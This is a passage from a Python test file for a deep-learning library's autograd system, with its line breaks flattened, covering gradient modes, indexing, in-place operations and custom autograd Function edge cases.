None] prev_values.append(y) prev_values.pop(0) # Definitely pick one tensor to add y += y * 0.000001 # Possibly add other tensors nprev = len(prev_tensors) if nprev == 2: y += randchoice[depth].mul(torch.cat(prev_tensors)).sum() # graph deletion occurs when the above locals go out of scope. # Should not stack overflow scope() def test_free_deep_graph_pyfunction(self): class MyOp(Function): @staticmethod def forward(ctx, tensor1, tensor2): return tensor1 + tensor2 @staticmethod def backward(ctx, grad_output): return grad_output, grad_output def scope(): depth = 150000 x = torch.randn(1, requires_grad=True) y = x.clone() # build deeply nested computation graph for _ in range(depth): y = MyOp.apply(y, y) # graph deletion occurs when the above locals go out of scope. # Should not stack overflow scope() def test_no_unnecessary_save(self): # If we kept x in the derivative Function of x * 2 we would # get an error in the backward that would complain that we've # modified x, which was needed for gradient computation. # Since we should elide unnecessary saves, this test should pass. mu = torch.ones(1, requires_grad=True) x = torch.empty(1) loss = 0 for i in range(3): x.detach_() x.copy_(mu + i) ft = torch.tensor([float(i)]) multiplied = x * ft s = multiplied.sum() loss += s loss.backward() def test_no_grad(self): x = torch.ones(5, 5, requires_grad=True) y = torch.ones(5, 5) * 4 with torch.no_grad(): w = x + y @torch.no_grad() def adder(x, y): return x + y z = adder(x, y) self.assertFalse(w.requires_grad) self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5))) self.assertIsNone(w.grad_fn) self.assertFalse(z.requires_grad) self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5))) self.assertIsNone(z.grad_fn) # test nested decorator and with-statement on no_grad with torch.no_grad(): self.assertFalse(torch.is_grad_enabled()) w = adder(x, y) self.assertFalse(torch.is_grad_enabled()) def test_set_grad_generator_functions(self): @torch.no_grad() def gen_no_grad(): for i in range(10): self.assertEqual(torch.is_grad_enabled(), False) yield i with torch.enable_grad(): for _ in gen_no_grad(): self.assertEqual(torch.is_grad_enabled(), True) @torch.enable_grad() def gen_enable_grad(): for i in range(10): self.assertEqual(torch.is_grad_enabled(), True) yield i with torch.no_grad(): for _ in gen_enable_grad(): self.assertEqual(torch.is_grad_enabled(), False) def test_set_grad_generator_functions_recursive(self): # enable_grad_decorator_recursive and no_grad_decorator_recursive call each other # recursively, to ensure that the decorators preserve the caller's setting @torch.enable_grad() def enable_grad_decorator_recursive(depth): self.assertTrue(torch.is_grad_enabled()) if depth > 0: no_grad_decorator_recursive(depth - 1) self.assertTrue(torch.is_grad_enabled()) @torch.no_grad() def no_grad_decorator_recursive(depth): self.assertFalse(torch.is_grad_enabled()) if depth > 0: enable_grad_decorator_recursive(depth - 1) self.assertFalse(torch.is_grad_enabled()) # enable_grad_context_manager_recursive and no_grad_context_manager_recursive call # each other recursively, to ensure that the decorators preserve the caller's setting def enable_grad_context_manager_recursive(depth): with torch.enable_grad(): self.assertTrue(torch.is_grad_enabled()) if depth > 0: no_grad_context_manager_recursive(depth - 1) self.assertTrue(torch.is_grad_enabled()) def no_grad_context_manager_recursive(depth): with torch.no_grad(): self.assertFalse(torch.is_grad_enabled()) if depth > 0: enable_grad_context_manager_recursive(depth - 1) self.assertFalse(torch.is_grad_enabled()) with torch.enable_grad(): self.assertTrue(torch.is_grad_enabled()) enable_grad_decorator_recursive(10) self.assertTrue(torch.is_grad_enabled()) enable_grad_context_manager_recursive(10) self.assertTrue(torch.is_grad_enabled()) with torch.no_grad(): self.assertFalse(torch.is_grad_enabled()) enable_grad_decorator_recursive(10) self.assertFalse(torch.is_grad_enabled()) enable_grad_context_manager_recursive(10) self.assertFalse(torch.is_grad_enabled()) def test_set_grad_coroutines(self): @torch.no_grad() def coro_no_grad(n=10): self.assertFalse(torch.is_grad_enabled()) for i in range(n): self.assertFalse(torch.is_grad_enabled()) r = yield i self.assertFalse(torch.is_grad_enabled()) self.assertEqual(i, r) self.assertFalse(torch.is_grad_enabled()) @torch.enable_grad() def coro_enable_grad(n=10): self.assertTrue(torch.is_grad_enabled()) for i in range(n): self.assertTrue(torch.is_grad_enabled()) r = yield i self.assertTrue(torch.is_grad_enabled()) self.assertEqual(i, r) self.assertTrue(torch.is_grad_enabled()) with torch.enable_grad(): self.assertTrue(torch.is_grad_enabled()) coro, r = coro_no_grad(), None try: while True: self.assertTrue(torch.is_grad_enabled()) r = coro.send(r) self.assertTrue(torch.is_grad_enabled()) except StopIteration: pass with torch.no_grad(): self.assertFalse(torch.is_grad_enabled()) coro, r = coro_enable_grad(), None try: while True: self.assertFalse(torch.is_grad_enabled()) r = coro.send(r) self.assertFalse(torch.is_grad_enabled()) except StopIteration: pass def test_set_grad_coroutines_benign_exceptions(self): class RecoverableException(Exception): pass @torch.no_grad() def coro_no_grad(n=10): has_raised = False for i in range(n): try: self.assertFalse(torch.is_grad_enabled()) yield (-i if has_raised else i) except RecoverableException: self.assertFalse(torch.is_grad_enabled()) has_raised = True @torch.enable_grad() def coro_enable_grad(n=10): has_raised = False for i in range(n): try: self.assertTrue(torch.is_grad_enabled()) yield (-i if has_raised else i) except RecoverableException: self.assertTrue(torch.is_grad_enabled()) has_raised = True with torch.enable_grad(): coro = coro_no_grad() assert 0 == next(coro) try: while True: r = coro.throw(RecoverableException) self.assertLess(r, 0) except StopIteration: pass with torch.no_grad(): coro = coro_enable_grad() assert 0 == next(coro) try: while True: r = coro.throw(RecoverableException) self.assertLess(r, 0) except StopIteration: pass def test_set_grad_coroutines_critical_exceptions(self): class UnrecoverableException(Exception): pass class SecondaryException(Exception): pass @torch.no_grad() def coro_no_grad(n=10): has_raised = False for i in range(n): try: self.assertFalse(torch.is_grad_enabled()) yield (-i if has_raised else i) except UnrecoverableException: self.assertFalse(torch.is_grad_enabled()) raise SecondaryException @torch.enable_grad() def coro_enable_grad(n=10): has_raised = False for i in range(n): try: self.assertTrue(torch.is_grad_enabled()) yield (-i if has_raised else i) except UnrecoverableException: self.assertTrue(torch.is_grad_enabled()) raise SecondaryException with torch.enable_grad(): coro = coro_no_grad() assert 0 == next(coro) with self.assertRaises(SecondaryException): coro.throw(UnrecoverableException) with torch.no_grad(): coro = coro_enable_grad() assert 0 == next(coro) with self.assertRaises(SecondaryException): coro.throw(UnrecoverableException) def test_set_grad_coroutines_exit(self): @torch.no_grad() def coro_no_grad(state): for i in range(10): try: self.assertFalse(torch.is_grad_enabled()) yield i except GeneratorExit: self.assertFalse(torch.is_grad_enabled()) state.add('GeneratorExit') raise @torch.enable_grad() def coro_enable_grad(state): for i in range(10): try: self.assertTrue(torch.is_grad_enabled()) yield i except GeneratorExit: self.assertTrue(torch.is_grad_enabled()) state.add('GeneratorExit') raise state = set() with torch.enable_grad(): coro = coro_no_grad(state) for i in range(5): next(coro) coro.close() self.assertTrue('GeneratorExit' in state) state = set() with torch.no_grad(): coro = coro_enable_grad(state) for i in range(5): next(coro) coro.close() self.assertTrue('GeneratorExit' in state) def test_no_grad_python_function(self): """Python Functions should respect grad mode.""" x = torch.ones(5, 5, requires_grad=True) class MyOp(Function): @staticmethod def forward(self, x): return x + 1 @staticmethod def backward(self, dy): return dy with torch.no_grad(): y = MyOp.apply(x) self.assertFalse(y.requires_grad) def test_indexing(self): x = torch.arange(1., 17).view(4, 4) y = Variable(x, requires_grad=True) def compare(x, y, idx, indexed_tensor, indexed_var): indexed_var_t = indexed_var.data if not isinstance(indexed_tensor, torch.Tensor): indexed_var_t = indexed_var_t[0] self.assertEqual(indexed_tensor, indexed_var_t) indexed_var.sum().backward() expected_grad = torch.empty(x.size()).fill_(0) expected_grad[idx] = 1 self.assertEqual(y.grad, expected_grad) def check_index(x, y, idx): if y.grad is not None: with torch.no_grad(): y.grad.zero_() indexed_tensor = x[idx] indexed_var = y[idx] compare(x, y, idx, indexed_tensor, indexed_var) check_index(x, y, 1) check_index(x, y, (1, 1)) check_index(x, y, slice(1, None)) check_index(x, y, slice(None, 2)) check_index(x, y, (slice(None, 2), 2)) check_index(x, y, (slice(1, 2), 2)) check_index(x, y, (1, slice(2, None))) check_index(x, y, (slice(None, None), slice(2, None))) check_index(x, y, torch.LongTensor([0, 2])) check_index(x, y, torch.rand(4, 4).bernoulli().bool()) check_index(x, y, (Ellipsis, slice(2, None))) check_index(x, y, ([0], [0])) check_index(x, y, ([1, 2, 3], [0])) check_index(x, y, ([1, 2], [2, 1])) check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 3]])) check_index(x, y, ([slice(None), [2, 3]])) check_index(x, y, ([[2, 3], slice(None)])) # advanced indexing, with less dim, or ellipsis check_index(x, y, ([0])) check_index(x, y, ([0], )) x = torch.arange(1., 49).view(4, 3, 4) y = Variable(x, requires_grad=True) check_index(x, y, (slice(None), [0], [0])) check_index(x, y, ([0], [0], slice(None))) check_index(x, y, (slice(None), [0, 1, 2], [0])) check_index(x, y, ([0, 1, 2], [0], slice(None))) check_index(x, y, (slice(None), [1, 2], [2, 1])) check_index(x, y, ([1, 2], [2, 1], slice(None))) check_index(x, y, (slice(None), [[1, 2], [2, 0]], [[0, 1], [2, 3]])) check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 2]], slice(None))) check_index(x, y, (slice(None), slice(None), [2, 1])) check_index(x, y, (slice(None), [2, 1], slice(None))) check_index(x, y, ([2, 1], slice(None), slice(None))) # advanced indexing, with less dim, or ellipsis check_index(x, y, ([0], )) check_index(x, y, ([0], slice(None))) check_index(x, y, ([0], Ellipsis)) check_index(x, y, ([1, 2], [0, 1])) check_index(x, y, ([1, 2], [0, 1], Ellipsis)) check_index(x, y, (Ellipsis, [1, 2], [0, 1])) # advanced indexing, with a tensor wrapped in a variable z = torch.LongTensor([0, 1]) zv = Variable(z, requires_grad=False) seq = [z, Ellipsis] seqv = [zv, Ellipsis] if y.grad is not None: with torch.no_grad(): y.grad.zero_() indexed_tensor = x[seq] indexed_var = y[seqv] compare(x, y, seq, indexed_tensor, indexed_var) def test_indexing_duplicates(self): x = torch.arange(1., 17).view(4, 4) y = Variable(x, requires_grad=True) idx = torch.LongTensor([1, 1, 3, 2, 1, 2]) y[idx].sum().backward() expected_grad = torch.zeros(4, 4) for i in idx: expected_grad[i] += 1 self.assertEqual(y.grad, expected_grad) # with advanced indexing x = torch.arange(1., 17).view(4, 4) y = Variable(x, requires_grad=True) idx = [[1, 1, 3, 2, 1, 2], [0]] y[idx].sum().backward() expected_grad = torch.zeros(4, 4) for i in idx[0]: for j in idx[1]: expected_grad[i][j] += 1 self.assertEqual(y.grad, expected_grad) x = torch.arange(1., 17).view(4, 4) y = Variable(x, requires_grad=True) idx = [[[1, 2], [0, 0]], [[0, 1], [1, 1]]] y[idx].sum().backward() expected_grad = torch.tensor([[0., 2., 0., 0.], [1., 0., 0., 0.], [0., 1., 0., 0.], [0., 0., 0., 0.]]) self.assertEqual(y.grad, expected_grad) x = torch.arange(1., 65).view(4, 4, 4) y = Variable(x, requires_grad=True) idx = [[1, 1, 1], slice(None), slice(None)] y[idx].sum().backward() expected_grad = torch.empty(4, 4, 4).zero_() expected_grad[1].fill_(3) self.assertEqual(y.grad, expected_grad) def test_index_backward_does_not_save_tensor(self): # Example from https://github.com/pytorch/pytorch/issues/24853. # if `index(tensor, indices)` saves `tensor` for backwards, then it will # trigger a version check on `tensor` during the backward pass, which # will cause the following code to error because `tensor` gets modified # by the indexing line. a = torch.tensor([1., 0, 0]) b = torch.zeros(3, requires_grad=True) tensor = b + 0 tensor[a != 0] = tensor[a != 0] tensor.backward(torch.zeros_like(tensor)) def test_volatile_deprecated(self): v = torch.autograd.torch.randn(3, 3) with warnings.catch_warnings(record=True) as w: self.assertFalse(v.volatile) self.assertIn('volatile', str(w[0].message)) def test_saved_variables_deprecated(self): class MyFunction(Function): @staticmethod def forward(ctx, tensor1, tensor2): ctx.save_for_backward(tensor1, tensor2) return tensor1 + tensor2 @staticmethod def backward(ctx, grad_output): var1, var2 = ctx.saved_variables return (grad_output, grad_output) with warnings.catch_warnings(record=True) as warns: warnings.simplefilter("always") x = torch.randn((3, 3), requires_grad=True) y = torch.randn((3, 3), requires_grad=True) MyFunction.apply(x, y).sum().backward() has_deprecated = map(lambda warn: 'deprecated' in str(warn) and 'saved_variables' in str(warn), warns) has_deprecated = reduce(lambda x, y: x or y, has_deprecated) self.assertTrue(has_deprecated) def test_requires_grad(self): x = torch.randn(5, 5) y = torch.randn(5, 5) z = torch.randn(5, 5, requires_grad=True) a = x + y self.assertFalse(a.requires_grad) b = a + z self.assertTrue(b.requires_grad) def error(): raise RuntimeError # Make sure backward isn't called on these a._backward_hooks = OrderedDict() x._backward_hooks = OrderedDict() y._backward_hooks = OrderedDict() a._backward_hooks['test'] = error x._backward_hooks['test'] = error y._backward_hooks['test'] = error b.backward(torch.ones(5, 5)) def test_requires_grad_(self): x = torch.randn(5, 5) y = torch.randn(5, 5, requires_grad=True) self.assertIs(x, x.requires_grad_()) self.assertTrue(x.requires_grad) self.assertIs(y, y.requires_grad_()) self.assertTrue(y.requires_grad) self.assertIs(x, x.requires_grad_(True)) self.assertTrue(x.requires_grad) self.assertIs(y, y.requires_grad_(True)) self.assertTrue(y.requires_grad) z = x * y self.assertRaises(RuntimeError, lambda: z.requires_grad_(False)) self.assertIs(z, z.requires_grad_()) self.assertTrue(z.requires_grad) self.assertIs(z, z.requires_grad_(True)) self.assertTrue(z.requires_grad) self.assertIs(x, x.requires_grad_(False)) self.assertFalse(x.requires_grad) self.assertIs(y, y.requires_grad_(False)) self.assertFalse(y.requires_grad) def test_requires_grad_inplace(self): a = torch.randn(5, 5) b = torch.randn(5, 5, requires_grad=True) a += b self.assertTrue(a.requires_grad) # non-leaf a = torch.randn(5, 5) + 0 b = torch.randn(5, 5, requires_grad=True) a += b self.assertTrue(a.requires_grad) def test_no_requires_grad_inplace(self): # basic case, should be able to modify inplace while requires_grad is False a = torch.randn(2, 3) a.add_(5) a.requires_grad = True a.sum().backward() self.assertEqual(a.grad, torch.ones(2, 3)) # same but with a view a = torch.randn(2, 3) b = a[:] b.add_(5) a.requires_grad = True a.sum().backward() self.assertEqual(a.grad, torch.ones(2, 3)) # should fail if requires_grad = True when we modify inplace a = torch.randn(2, 3) b = a[:] a.requires_grad = True with self.assertRaises(RuntimeError): a.add_(5) with self.assertRaises(RuntimeError): b.add_(5) def test_attribute_deletion(self): x = torch.randn((5, 5), requires_grad=True) del x.grad self.assertIsNone(x.grad) with self.assertRaises(RuntimeError): del x.data with self.assertRaises(TypeError): x.data = None with self.assertRaises(RuntimeError): del x.requires_grad with self.assertRaises(RuntimeError): del x._grad_fn with self.assertRaises(RuntimeError): del x._backward_hooks def test_duplicate_backward_root(self): a = torch.randn(5, 5, requires_grad=True) b = torch.randn(5, 5, requires_grad=True) x = a * b grad_output = torch.randn_like(x) torch.autograd.backward([x, x], [grad_output, grad_output]) self.assertEqual(a.grad, b * grad_output * 2) self.assertEqual(b.grad, a * grad_output * 2) def test_backward_no_grad(self): a = torch.randn(5, 5, requires_grad=True) b = a + 2 with self.assertRaises(RuntimeError): torch.autograd.backward([b], [None]) def test_backward_twice_with_saved_values(self): b = torch.randn(3, requires_grad=True, dtype=torch.double) c = torch.zeros(3, dtype=torch.double) c[[1, 2]] = b[[1, 1]] c.backward(torch.tensor([1, 1, 1], dtype=torch.double)) self.assertRaisesRegex(RuntimeError, 'Specify retain_graph=True', lambda: c.backward(torch.tensor([1, 1, 1], dtype=torch.double))) def test_backward_twice_retained_graph_with_saved_values(self): b = torch.randn(3, requires_grad=True, dtype=torch.double) c = torch.zeros(3, dtype=torch.double) c[[1, 2]] = b[[1, 1]] c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True) c.backward(torch.tensor([1, 1, 1], dtype=torch.double)) def test_backward_twice_without_saved_values(self): b = torch.randn(3, requires_grad=True, dtype=torch.double) c = b + 1 c.backward(torch.tensor([1, 1, 1], dtype=torch.double)) c.backward(torch.tensor([1, 1, 1], dtype=torch.double)) def test_backward_twice_retained_graph_without_saved_values(self): b = torch.randn(3, requires_grad=True, dtype=torch.double) c = torch.zeros(3, dtype=torch.double) c[[1, 2]] = b[[1, 1]] c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True) c.backward(torch.tensor([1, 1, 1], dtype=torch.double)) def test_next_functions(self): x = torch.randn(5, 5, requires_grad=True) y = torch.randn(5, 5, requires_grad=True) a = x + y self.assertIsNotNone(a.grad_fn) next_functions = a.grad_fn.next_functions self.assertEqual(len(next_functions), 2) self.assertIsInstance(next_functions[0][0], torch._C._functions.AccumulateGrad) self.assertEqual(next_functions[0][1], 0) self.assertIsInstance(next_functions[1][0], torch._C._functions.AccumulateGrad) self.assertEqual(next_functions[1][1], 0) b = a + 5 next_functions = b.grad_fn.next_functions self.assertEqual(len(next_functions), 2) self.assertIs(next_functions[0][0], a.grad_fn) self.assertIs(next_functions[1][0], None) def test_inplace(self): x = torch.ones(5, 5, requires_grad=True) y = Variable(torch.ones(5, 5) * 4, requires_grad=True) z = x * y q = z + y w = z * y z.add_(2) # Add doesn't need it's inputs to do backward, so it shouldn't raise q.backward(torch.ones(5, 5), retain_graph=True) # Mul saves both inputs in forward, so it should raise self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5))) z = x * y q = z * y r = z + y w = z.add_(y) # w is a the last expression, so this should succeed w.backward(torch.ones(5, 5), retain_graph=True) # r doesn't use the modified value in backward, so it should succeed r.backward(torch.ones(5, 5), retain_graph=True) # q uses dirty z, so it should raise self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5))) with torch.no_grad(): x.grad.zero_() m = x / 2 z = m + y / 8 q = z * y r = z + y prev_version = z._version w = z.exp_() self.assertNotEqual(z._version, prev_version) r.backward(torch.ones(5, 5), retain_graph=True) self.assertEqual(x.grad, torch.ones(5, 5) / 2) w.backward(torch.ones(5, 5), retain_graph=True) self.assertEqual(x.grad, torch.empty(5, 5).fill_((1 + math.e) / 2)) self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5))) leaf = torch.ones(5, 5, requires_grad=True) x = leaf.clone() x.add_(10) self.assertEqual(x, torch.ones(5, 5) * 11) # x should be still usable y = x + 2 y.backward(torch.ones(5, 5)) self.assertEqual(leaf.grad, torch.ones(5, 5)) z = x * y x.add_(2) self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5))) def test_mark_non_differentiable(self): class MyFunction(Function): @staticmethod def forward(ctx, input): output = input > 0 ctx.mark_non_differentiable(output) return output @staticmethod def backward(ctx, grad_output): return (grad_output * 0).to(torch.double) x = torch.randn(5, 5, requires_grad=True) mask = MyFunction.apply(x) self.assertFalse(mask.requires_grad) y = x.masked_fill(mask, 0) y.sum().backward() def test_mark_non_differentiable_mixed(self): class MyFunction(Function): @staticmethod def forward(ctx, input): a = input + 1 b = input + 2 ctx.mark_non_differentiable(a) return a, b @staticmethod def backward(ctx, grad_a, grad_b): self.assertTrue((grad_a == 0).all()) self.assertTrue((grad_b == 1).all()) return grad_b x = torch.randn(5, 5, requires_grad=True) a, b = MyFunction.apply(x) self.assertFalse(a.requires_grad) self.assertTrue(b.requires_grad) b.sum().backward() self.assertEqual(x.grad, torch.ones(5, 5)) def test_mark_non_differentiable_none(self): # This used to segfault because MyFunction would send back null # gradients to MulBackward, which is implemented in C++. C++ # implemented functions expect incoming grad_ouptuts to be non-null. class MyFunction(Function): @staticmethod def forward(ctx, input): output = input.clone() ctx.mark_non_differentiable(output) return output @staticmethod def backward(ctx, grad_output): return None x = torch.randn(5, 5, requires_grad=True) r = MyFunction.apply(x * x) (r * x).sum().backward() def test_return_duplicate(self): class DoubleDuplicate(Function): @staticmethod def forward(ctx, x): output = x * 2 return output, output @staticmethod def backward(ctx, grad1, grad2): return grad1 * 2 + grad2 * 2 def fn(x): a, b = DoubleDuplicate.apply(x) self.assertIs(a, b) return a + b x = torch.randn(5, 5, dtype=torch.double, requires_grad=True) gradcheck(fn, [x]) gradgradcheck(fn, [x]) def test_return_duplicate_inplace(self): class DoubleInplace(Function): @staticmethod def forward(ctx, x): x.mul_(2) ctx.mark_dirty(x) return x, x @staticmethod def backward(ctx, grad1, grad2): return grad1 * 2 + grad2 * 2 def inplace_fn(x): a, b = DoubleInplace.apply(x.clone()) self.assertIs(a, b) return a + b x = torch.randn(5, 5, dtype=torch.double, requires_grad=True) gradcheck(inplace_fn, [x]) gradgradcheck(inplace_fn, [x]) # Can't modify leaf variables in-place self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x)) # Functions which modify views in-place must return only one output self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x.clone()[0])) @suppress_warnings def test_resize(self): x = torch.ones(2, 3) self.assertTrue(x.resize(3, 2).size() == (3, 2)) def _test_setitem(self, size, index): x = torch.ones(*size, requires_grad=True) y = x + 2 y_version = y._version y[index] = 2 self.assertNotEqual(y._version, y_version) y.backward(torch.ones(*size)) expected_grad = torch.ones(*size) expected_grad[index] = 0 self.assertEqual(x.grad, expected_grad) def _test_setitem_tensor(self, size, index): x = torch.ones(*size, requires_grad=True) y = x + 2 y_version = y._version value = x.new(x[index].size()).fill_(7) value.requires_grad = True y[index] = value self.assertNotEqual(y._version, y_version) y.backward(torch.ones(*size)) expected_grad_input = torch.ones(*size) expected_grad_input[index] = 0 self.assertEqual(x.grad, expected_grad_input) self.assertEqual(value.grad, torch.ones_like(value)) # case when x broadcasts to as y[1] x = torch.randn(4, requires_grad=True) y = torch.zeros(2, 3, 4) y[1] = x y.backward(torch.randn(2, 3, 4)) self.assertEqual(x.size(), x.grad.size()) def test_setitem(self): self._test_setitem((5, 5), 1) self._test_setitem((5,), 1) self._test_setitem((1,), 0) self._test_setitem((10,), [[0, 4, 2]]) self._test_setitem((5, 5), [[0, 4], [2, 2]]) self._test_setitem((5, 5, 5), [slice(None), slice(None), [1, 3]]) self._test_setitem((5, 5, 5), [slice(None), [1, 3], slice(None)]) self._test_setitem((5, 5, 5), [[1, 3], slice(None), slice(None)]) self._test_setitem((5, 5, 5), [slice(None), [2, 4], [1, 3]]) self._test_setitem((5, 5, 5), [[1, 3], [2, 4], slice(None)]) self._test_setitem_tensor((5, 5), 3) self._test_setitem_tensor((5, 5), [[0, 1], [1, 0]]) self._test_setitem_tensor((5,), 3) self._test_setitem_tensor((5,), Variable(torch.LongTensor([3]), requires_grad=False).sum()) self._test_setitem_tensor((5,), [[0, 1, 2, 3]]) self._test_setitem_tensor((5, 5, 5), [slice(None), slice(None), [1, 3]]) self._test_setitem_tensor((5, 5, 5), [slice(None), [1, 3], slice(None)]) self._test_setitem_tensor((5, 5, 5), [[1, 3], slice(None), slice(None)]) self._test_setitem_tensor((5, 5, 5), [slice(None), [2, 4], [1, 3]]) self._test_setitem_tensor((5, 5, 5), [[1, 3], [2, 4], slice(None)]) self._test_setitem_tensor((5, 5, 5), [Variable(torch.LongTensor([1, 3]), requires_grad=False), [2, 4], slice(None)]) def test_setitem_mask(self): mask = torch.BoolTensor(5, 5).bernoulli_() self._test_setitem((5, 5), Variable(mask)) self._test_setitem((5,), Variable(mask[0])) self._test_setitem((1,), Variable(mask[0, 0:1])) self._test_setitem_tensor((5, 5), Variable(mask)) self._test_setitem_tensor((5,), Variable(mask[0])) def test_select_sum(self): # both select and sum return Scalars in ATen; ensure they work together. x = torch.randn(10, dtype=torch.double, requires_grad=True) def func(x): return x.select(0, 1).sum() gradcheck(func, [x]) gradgradcheck(func, [x]) def test_diagonal_expanded_v(self): value = torch.rand([]) v_expanded = torch.tensor(value).expand(10) a = torch.rand(10, 10, dtype=torch.double, requires_grad=True) result, = torch.autograd.grad(a.diagonal(), a, v_expanded) self.assertEqual(result, torch.eye(10, dtype=torch.double) * value) def test_select_expanded_v(self): v_expanded = torch.rand(10).expand(10, 10) a = torch.rand(10, 10, 10, requires_grad=True) result, = torch.autograd.grad(a[0], a, v_expanded) expected = torch.zeros(10, 10, 10) expected[0] = v_expanded self.assertEqual(result, expected) def test_slice_expanded_v(self): v_expanded = torch.rand(10, 1).expand(2, 10, 10) a = torch.rand(10, 10, 10, requires_grad=True) result, = torch.autograd.grad(a[3:5], a, v_expanded) expected = torch.zeros(10, 10, 10) expected[3:5] = v_expanded self.assertEqual(result, expected) def test_unbind(self): stacked = torch.randn(3, 10, 10, requires_grad=True) x, y, z = stacked.unbind() grad = torch.randn(3, 10, 10) torch.autograd.backward([x, y, z], grad.unbind()) self.assertEqual(stacked.grad, grad) # check that it works with only one gradient provided (#9977) for i in range(3): stacked = torch.randn(3, 10, 10, requires_grad=True) outs = stacked.unbind() gi = grad.unbind()[i] g, = torch.autograd.grad(outs[i], stacked, gi) g_expected = torch.stack([gi if j == i else torch.zeros_like(gi) for j in range(3)], dim=0) self.assertEqual(g, g_expected) def test_fill(self): root = torch.randn(4, 5, requires_grad=True) def func(root): x = root.clone() x.fill_(2) return x gradcheck(func, [root]) gradgradcheck(func, [root]) def test_unused_output(self): x = torch.randn(10, 10, requires_grad=True) outputs = x.chunk(5) o = outputs[2] o = o * 4 + 2 o.sum().backward() expected_grad = torch.zeros(10, 10) expected_grad[4:6] = 4 self.assertEqual(x.grad, expected_grad) with torch.no_grad(): x.grad.zero_() grad_output = torch.randn(2, 10) outputs = x.chunk(5) outputs[0].backward(grad_output) expected_grad = torch.zeros(10, 10) expected_grad[:2] = grad_output self.assertEqual(x.grad, expected_grad) def _test_sparse_gather(self, size_x, size_ind, dim): x = torch.randn(size_x, requires_grad=True) if len(size_ind) > 0 and len(size_x) > 0: ind = torch.randint(x.size(dim), size_ind) else: ind = torch.zeros(size_ind, dtype=torch.int64) out = torch.gather(x, dim, ind, sparse_grad=False) grad = torch.rand_like(out) out.backward(grad) grad_dense = x.grad.clone() x.grad = None out = torch.gather(x, dim, ind, sparse_grad=True) out.backward(grad) self.assertEqual(grad_dense, x.grad.to_dense()) def test_sparse_gather_dim0(self): self._test_sparse_gather((10, 10), (5, 10), 0) def test_sparse_gather_dim1(self): self._test_sparse_gather((10, 10, 5), (10, 5, 5), 1) def test_sparse_gather_dim_neg(self): self._test_sparse_gather((10, 10, 5), (10, 10, 2), -1) def test_sparse_gather_ind_scalar(self): self._test_sparse_gather((10,), (), 0) def test_sparse_gather_x_scalar(self): self._test_sparse_gather((), (2,), 0) def test_sparse_gather_both_scalar(self): self._test_sparse_gather((), (), 0) def test_gc_in_destructor(self): """ Previously, if a Function destructor triggered a garbage collection, the Variable's tp_dealloc handler would get called twice leading to a segfault. """ class CollectOnDelete(Function): def forward(self, x): return x def backward(self, grad_output): return grad_output def __del__(self): gc.collect() for _ in range(10): CollectOnDelete().forward(torch.randn(1, requires_grad=True)).backward() def test_naughty_autograd_function_attribute_access(self): class Id(Function): @staticmethod def forward(ctx, x): return x @staticmethod def backward(ctx, grad_x): return grad_x with self.assertWarnsRegex(DeprecationWarning, "should not be instantiated"): f = Id() # # After raising warning, should still return an instance self.assertIsInstance(f, Id) x = torch.zeros(1, requires_grad=True) with self.assertRaisesRegex(RuntimeError, "non-static forward method is deprecated"): f(x) t = Id.apply(x) self.assertEqual(t.grad_fn.name(), "IdBackward") # THPFunction is the base class of both grad_fn and autograd functions, # which means that a lot of accessors on them may segfault. Test that we # properly error in this case. t = torch.ones(1, requires_grad=True) t._backward_hooks = dict() with self.assertRaisesRegex(RuntimeError, "Attribute '_register_hook_dict' is invalid"): f._register_hook_dict(t) with self.assertRaisesRegex(RuntimeError, "Attribute 'register_hook' is invalid"): f.register_hook(lambda x, y: None) with self.assertRaisesRegex(RuntimeError, "Attribute 'next_functions' is invalid"): f.next_functions with self.assertRaisesRegex(RuntimeError, "Attribute 'name' is invalid"): f.name() with self.assertRaisesRegex(RuntimeError, "underlying PyNode has already been deallocated"): f.metadata @unittest.expectedFailure def test_naughty_anomaly_access(self): class MyFunction(Function): @staticmethod def forward(ctx, x): return x @staticmethod def backward(ctx, g): return g x = torch.zeros(1, requires_grad=True) y = MyFunction.apply(x) y.backward() y.grad_fn.metadata g = y.grad_fn del y g.metadata # this currently fails, but shouldn't def test_naughty_autograd_function_stashing_ctx(self): saved_ctx = [] class Id(Function): @staticmethod def forward(ctx, x): ctx.save_for_backward(x) return x @staticmethod def backward(ctx, grad_x): saved_ctx.append(ctx) return ctx.saved_tensors p = torch.zeros(1, requires_grad=True) loss = Id.apply(p) loss.backward(retain_graph=True) del loss # At this point in time, it complains that the graph has been freed # (which indeed true, although a somewhat indirect way of stating the # problem). self.assertRaises(RuntimeError, lambda: saved_ctx[0].saved_tensors) def test_custom_autograd_repeated_grad_grad(self): # This test failed the equality check in PR #22983; it's an interesting # and different test case worth enshrining. mult1 is not testing # anything that interesting, but mult2 is the interesting case. def mult1(x): return x.prod(dim=-1).prod(dim=-1) class Mult(torch.autograd.Function): @staticmethod def forward(ctx, x): y = mult1(x) ctx.save_for_backward(x, y) return y @staticmethod def backward(ctx, grad_output): x, y = ctx.saved_tensors return (grad_output * y)[:, None, None] / x mult2 = Mult.apply def check_gradgrad_repeated(x, y): gy, = torch.autograd.grad(y[0], x, create_graph=True) ggy_1, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True) gy, = torch.autograd.grad(y[0], x, create_graph=True) ggy_2, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True) self.assertEqual(ggy_1[0, 0, 1], ggy_2[0, 0, 1]) x = torch.ones(2, 4, 4).requires_grad_() check_gradgrad_repeated(x, mult1(x)) check_gradgrad_repeated(x, mult2(x)) def test_custom_autograd_no_early_free(self): # This test failed complaining that buffers had already been freed # prior to #22983. Also pretty interesting test case. class Double(torch.autograd.Function): @staticmethod def forward(ctx, x): y = x ** 2 ctx.save_for_backward(x, y) return y @staticmethod def backward(ctx, grad_output): x, _ = ctx.saved_tensors return grad_output * 2 * x # this is equivalent, but uses the output of .forward() in .backward() class Double2(Double): @staticmethod def backward(ctx, grad_output): x, y = 